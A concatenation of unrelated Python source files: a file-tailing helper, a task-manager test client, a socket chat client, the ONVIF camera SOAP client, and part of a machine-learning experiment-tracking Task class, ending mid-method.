open(log_fpath, 'a').close()  # make sure the file exists before tailing it
p = Process(target=self.f, args=(log_fpath,))
self.process = p
p.start()
def f(self, log_fpath):
# Runs in the child process: block on the file and print each new line.
with open(log_fpath) as log_file:
for line in tailer.follow(log_file):
print(line)
def stop(self):
self.process.terminate()
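# A minimal usage sketch (the log path below is hypothetical):
#
#     tail = FileTail('/tmp/app.log')  # spawns a child process following the file
#     ...                              # the child prints each newly appended line
#     tail.stop()                      # terminates the tailing process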
|
test_client.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 6 09:02:52 2018
@author: Sandra Koster (sandra.koster@tno.nl)
"""
import time
import threading
import json
from horseModuleCore.horse_task_manager import HorseTaskManager
from horseModuleCore.ar_logger import ARLogger
def ARmain():
ar_logger = ARLogger()
print('init task manager')
tm = HorseTaskManager()
print('start task manager')
tm.start()
while True:
print("running")
tm.run_once()
taskdef_id = tm.getMPMSTaskID()
print("taskdef id: %s" % taskdef_id)
print("MPMS task: %s" % tm.MPMStask)
if taskdef_id is not None:
print(json.dumps(tm.MPMStask))
wi_task_success = True
if wi_task_success:
print('Task SUCCESS')
print('Task completed message: ' + str(tm.createTaskCompleteMessage()))
tm.sendMPMSTaskCompleted()
else:
print('Task FAILED')
print('Task completed message: ' + str(tm.createTaskFailedMessage()))
tm.sendMPMSTaskFailed()
time.sleep(0.5)
thread = threading.Thread(target=ARmain)
thread.start()
|
client.py
|
import socket
import errno
import sys
import threading
import time
HEADER_LENGTH = 10
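# Every message is framed with a fixed-width, left-justified ASCII header that
# holds the payload length. For example, the 5-byte payload b"hello" goes out
# as b"5         hello" (the length "5" padded to HEADER_LENGTH bytes), so the
# receiver always knows exactly how many bytes to read next.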
IP = "192.168.1.2"
PORT = 1234
my_username = input("Username: ")
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((IP, PORT))
client_socket.setblocking(False)
username = bytes(my_username, "utf-8")
username = bytes(f"{len(username):<{HEADER_LENGTH}}", "utf-8") + username
client_socket.send(username)
def receive_message(name):
while True:
try:
while True:
username_header = client_socket.recv(HEADER_LENGTH)
if not username_header:
print("connection closed by the server")
input()
sys.exit()
username_length = int(username_header.decode("utf-8"))
username = client_socket.recv(username_length).decode("utf-8")
message_header = client_socket.recv(HEADER_LENGTH)
message_length = int(message_header.decode("utf-8"))
message = client_socket.recv(message_length).decode("utf-8")
print(f"{username}: {message}")
except IOError as e:
if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:
print(str(e))
input()
sys.exit()
#print(e)
time.sleep(1)
continue
x = threading.Thread(target=receive_message, args=(1,))
x.start()
while True:
message = input()
if message:
message = message.encode("utf-8")
message_header = f"{len(message):<{HEADER_LENGTH}}".encode("utf-8")
client_socket.send(message_header + message)
|
client.py
|
from __future__ import print_function, division
__version__ = '0.0.1'
import datetime as dt
import logging
import os.path
from threading import Thread, RLock
from zeep.client import Client, CachingClient, Settings
from zeep.wsse.username import UsernameToken
import zeep.helpers
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('zeep.client').setLevel(logging.CRITICAL)
# Ensure wrapped methods raise an ONVIFError exception
# when something goes wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
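# Illustrative effect of the decorator: a zeep transport or parsing error
# raised inside a wrapped call such as device_service.GetHostname() reaches
# the caller as a single ONVIFError rather than a zeep-specific exception.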
class UsernameDigestTokenDtDiff(UsernameToken):
"""
UsernameDigestToken class with an adjustable time-offset parameter.
This allows authentication on cameras whose clocks are not time-synchronized.
Please note that using NTP on both ends is the recommended solution;
this should only be used in "safe" environments.
"""
def __init__(self, user, passw, dt_diff=None, **kwargs):
super().__init__(user, passw, **kwargs)
self.dt_diff = dt_diff # Date/time difference in datetime.timedelta
def apply(self, envelope, headers):
old_created = self.created
if self.created is None:
self.created = dt.datetime.utcnow()
if self.dt_diff is not None:
self.created += self.dt_diff
result = super().apply(envelope, headers)
self.created = old_created
return result
class ONVIFService(object):
"""
Python implementation of an ONVIF Service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print(ret.FromDHCP)
>>> print(ret.Name)
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print(ret.DaylightSavings)
>>> print(ret.TimeZone)
>>> dict_ret = device_service.to_dict(ret)
>>> print(dict_ret['TimeZone'])
There are two ways to pass parameters to service methods:
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
"""
@safe_func
def __init__(self, xaddr, user, passwd, url,
encrypt=True, daemon=False, zeep_client=None, no_cache=False,
dt_diff=None, binding_name='', transport=None):
if not os.path.isfile(url):
raise ONVIFError("%s doesn't exist!" % url)
self.url = url
self.xaddr = xaddr
wsse = UsernameDigestTokenDtDiff(user, passwd, dt_diff=dt_diff, use_digest=encrypt)
# Create soap client
if not zeep_client:
ClientType = Client if no_cache else CachingClient
settings = Settings()
settings.strict = False
settings.xml_huge_tree = True
self.zeep_client = ClientType(wsdl=url, wsse=wsse, transport=transport, settings=settings)
else:
self.zeep_client = zeep_client
self.ws_client = self.zeep_client.create_service(binding_name, self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicate whether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.create_type = lambda x: self.zeep_client.get_element('ns0:' + x)()
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['zeep_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(zeepobject):
# Convert a WSDL Type instance into a dictionary
return {} if zeepobject is None else zeep.helpers.serialize_object(zeepobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
else:
params = ONVIFService.to_dict(params)
try:
ret = func(**params)
except TypeError:
ret = func(params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
"""
Call the real onvif Service operations,
See the official wsdl definition for the
APIs detail(API name, request parameters,
response parameters, parameter types, etc...)
"""
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client, name))
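# Illustrative dispatch: an attribute access such as
# device_service.GetDeviceInformation() (an example ONVIF operation name, not
# defined in this module) is resolved here at lookup time against the zeep
# service proxy and wrapped by service_wrapper, so no operation methods need
# to be declared on this class.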
class ONVIFCamera(object):
"""
Python implementation of an ONVIF-compliant device.
This class integrates the ONVIF services.
The adjust_time parameter allows authentication on cameras whose clocks are not time-synchronized.
Please note that using NTP on both ends is the recommended solution;
this should only be used in "safe" environments.
Also, this cannot be used on AXIS cameras, as every request is authenticated, contrary to the ONVIF standard.
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> ptz_service.GetConfiguration()
"""
# Class-level variables
services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None}
use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True}
def __init__(self, host, port, user, passwd,
wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)),
"wsdl"),
encrypt=True, daemon=False, no_cache=False, adjust_time=False,
transport=None):
os.environ.pop('http_proxy', None)
os.environ.pop('https_proxy', None)
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
self.transport = transport
# Active service client container
self.services = {}
self.services_lock = RLock()
# Set xaddrs
self.update_xaddrs()
self.to_dict = ONVIFService.to_dict
def update_xaddrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time:
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day,
cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt = self.create_devicemgmt_service()
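# The offset computed above (camera clock minus local clock) is added to the
# WS-UsernameToken 'Created' timestamp in UsernameDigestTokenDtDiff.apply,
# so digest authentication still succeeds when the camera's clock is skewed.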
# Get XAddr of services on the device
self.xaddrs = {}
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name in capabilities:
capability = capabilities[name]
try:
if name.lower() in SERVICES and capability is not None:
ns = SERVICES[name.lower()]['ns']
self.xaddrs[ns] = capability['XAddr']
except Exception:
logger.exception('Unexpected service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = \
self.event.CreatePullPointSubscription().SubscriptionReference.Address._value_1
except Exception:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in self.services.keys():
xaddr = getattr(self.capabilities, sname.capitalize()).XAddr
self.services[sname].ws_client.set_options(location=xaddr)
def get_service(self, name, create=True):
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name, portType=None):
"""Returns xaddr and wsdl of specified service"""
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
binding_name = '{%s}%s' % (ns, SERVICES[name]['binding'])
if portType:
ns += '/' + portType
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
xaddr = '%s:%s/onvif/device_service' % \
(self.host if (self.host.startswith('http://') or self.host.startswith('https://'))
else 'http://%s' % self.host, self.port)
return xaddr, wsdlpath, binding_name
# Get other XAddr
xaddr = self.xaddrs.get(ns)
if not xaddr:
raise ONVIFError("Device doesn't support service: %s" % name)
return xaddr, wsdlpath, binding_name
def create_onvif_service(self, name, portType=None, transport=None):
"""
Create ONVIF service client.
:param name: service name, should be present as a key within
the `SERVICES` dictionary declared within the `onvif.definition` module
:param portType:
:param transport:
:return:
"""
"""Create ONVIF service client"""
name = name.lower()
xaddr, wsdl_file, binding_name = self.get_definition(name, portType)
with self.services_lock:
if not transport:
transport = self.transport
service = ONVIFService(xaddr, self.user, self.passwd,
wsdl_file, self.encrypt,
self.daemon, no_cache=self.no_cache,
dt_diff=self.dt_diff,
binding_name=binding_name,
transport=transport)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, transport=None):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', transport=transport)
def create_media_service(self, transport=None):
return self.create_onvif_service('media', transport=transport)
def create_ptz_service(self, transport=None):
return self.create_onvif_service('ptz', transport=transport)
def create_imaging_service(self, transport=None):
return self.create_onvif_service('imaging', transport=transport)
def create_deviceio_service(self, transport=None):
return self.create_onvif_service('deviceio', transport=transport)
def create_events_service(self, transport=None):
return self.create_onvif_service('events', transport=transport)
def create_analytics_service(self, transport=None):
return self.create_onvif_service('analytics', transport=transport)
def create_recording_service(self, transport=None):
return self.create_onvif_service('recording', transport=transport)
def create_search_service(self, transport=None):
return self.create_onvif_service('search', transport=transport)
def create_replay_service(self, transport=None):
return self.create_onvif_service('replay', transport=transport)
def create_pullpoint_service(self, transport=None):
return self.create_onvif_service('pullpoint',
portType='PullPointSubscription',
transport=transport)
def create_receiver_service(self, transport=None):
return self.create_onvif_service('receiver', transport=transport)
def create_notification_service(self, transport=None):
return self.create_onvif_service('notification', transport=transport)
def create_subscription_service(self, transport=None):
return self.create_onvif_service('subscription', transport=transport)
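# A minimal connection sketch (host, port and credentials are illustrative,
# and GetProfiles is an example media operation not defined in this module):
#
#     cam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345', adjust_time=True)
#     media = cam.create_media_service()
#     profiles = media.GetProfiles()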
|
task.py
|
""" Backend task management support """
import collections
import itertools
import logging
import os
from enum import Enum
from threading import Thread
from multiprocessing import RLock
import six
from six.moves.urllib.parse import quote
from ...backend_interface.task.repo.scriptinfo import ScriptRequirements
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from pathlib2 import Path
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend, \
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage import StorageHelper
from ...storage.helper import StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from ...config import config
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
training = 'training'
testing = 'testing'
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: TaskTypes (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self._edit_lock = RLock()
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
else:
# this is an existing task, let's try to verify stuff
self._validate()
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib is never in debug/info
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(self.session, self.task_id)
# Add backend handler to both loggers:
# 1. to the root logger
# 2. to our own logger as well, since our logger does not propagate to the root logger
# (if it propagated, our records would be caught by the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
else:
StorageHelper._test_bucket_config(conf=conf, log=self.log, raise_on_error=raise_errors)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version:
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'TRAINS new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(log=self.log, create_requirements=False)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
self.data.script = result.script
# Since we might run asynchronously, don't use self.data (lest someone else
# overwrite it before we have a chance to call edit)
self._edit(script=result.script)
self.reload()
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
self.reload()
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s by %(user)s@%(host)s')
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
self._set_storage_uri(value)
@property
def task_id(self):
return self.id
@property
def name(self):
return self.data.name or ''
@name.setter
def name(self, value):
self.set_name(value)
@property
def task_type(self):
return self.data.type
@property
def project(self):
return self.data.project
@property
def parent(self):
return self.data.parent
@property
def input_model_id(self):
return self.data.execution.model
@property
def output_model_id(self):
return self.data.output.model
@property
def comment(self):
return self.data.comment or ''
@comment.setter
def comment(self, value):
self.set_comment(value)
@property
def cache_dir(self):
""" Cache dir used to store task related files """
return Path(get_cache_dir()) / self.id
@property
def status(self):
""" The task's status. In order to stay updated, we always reload the task info when this value is accessed. """
self.reload()
return self._status
@property
def _status(self):
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False):
return Model(
session=self.session,
model_id=None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
"""
Returns a simple metrics reporter instance
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task_id=self.id,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics')
)
return self._metrics_manager
def _setup_reporter(self):
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
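# For example (illustrative values), a project "MyProject" and a task named
# "train" with id "abc123" yield the suffix "MyProject/train.abc123/models"
# when called with extra_path='models'; characters outside the safe set are
# percent-quoted.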
def _reload(self):
""" Reload the task object from the backend """
with self._edit_lock:
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
self.reload()
def started(self, ignore_errors=True):
""" Signal that this task has started """
return self.send(tasks.StartedRequest(self.id), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True):
""" Signal that this task has stopped """
return self.send(tasks.StoppedRequest(self.id), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
""" Signal that this task has been completed """
if hasattr(tasks, 'CompletedRequest'):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
""" Signal that this task has stopped """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
""" Signal that this task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
""" Change the task's model_desc """
with self._edit_lock:
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
"""
Update the task's output model.
Note that this method only updates the model's metadata using the API and does not upload any data. Use this
method to update the output model when you have a local model URI (e.g. storing the weights file locally and
providing a file://path/to/file URI)
:param model_uri: URI for the updated model weights file
:type model_uri: str
:param name: Optional updated model name
:type name: str
:param comment: Optional updated model description
:type comment: str
:param tags: Optional updated model tags
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self, model_file, name=None, comment=None, tags=None, async_enable=False, cb=None, iteration=None):
"""
Update the task's output model weights file. File is first uploaded to the preconfigured output destination (see
        task's output.destination property or call setup_upload()), then the model object associated with the task is
updated using an API call with the URI of the uploaded file (and other values provided by additional arguments)
:param model_file: Path to the updated model weights file
:type model_file: str
:param name: Optional updated model name
:type name: str
:param comment: Optional updated model description
:type comment: str
:param tags: Optional updated model tags
:type tags: [str]
:param async_enable: Request asynchronous upload. If False, the call blocks until upload is completed and the
API call updating the model returns. If True, the call returns immediately, while upload and update are
scheduled in another thread. Default is False.
:type async_enable: bool
        :param cb: Asynchronous callback. If async_enable=True, this callback will be invoked once the asynchronous
            upload and update have completed.
        :param iteration: Optional iteration number to associate with the uploaded model
        :return: The URI of the uploaded weights file. If async_enable=True, this is the expected URI, as the upload
            is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
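    # Usage sketch (hypothetical file and model names, not part of this module):
    #
    #   uri = task.update_output_model_and_upload(
    #       'weights.h5', name='my-model', comment='post-training weights',
    #       async_enable=False)
    #   print(uri)  # URI of the uploaded weights file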
def _conditionally_start_task(self):
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
"""
Set a new input model for this task. Model must be 'ready' in order to be used as the Task's input model.
:param model_id: ID for a model that exists in the backend. Required if model_name is not provided.
:param model_name: Model name. Required if model_id is not provided. If provided, this name will be used to
locate an existing model in the backend.
:param update_task_design: if True, the task's model design will be copied from the input model
:param update_task_labels: if True, the task's label enumeration will be copied from the input model
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by='-created',
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def set_parameters(self, *args, **kwargs):
"""
Set parameters for this task. This allows setting a complete set of key/value parameters, but does not support
        parameter descriptions (as the input is a dictionary of key/value pairs).
:param args: Positional arguments (one or more dictionary or (key, value) iterable). These will be merged into
a single key/value dictionary.
:param kwargs: Key/value pairs, merged into the parameters dictionary created from `args`.
"""
        if not all(isinstance(x, (dict, collections.abc.Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
parameters = dict() if not update else self.get_parameters()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
with self._edit_lock:
execution = self.data.execution
if execution is None:
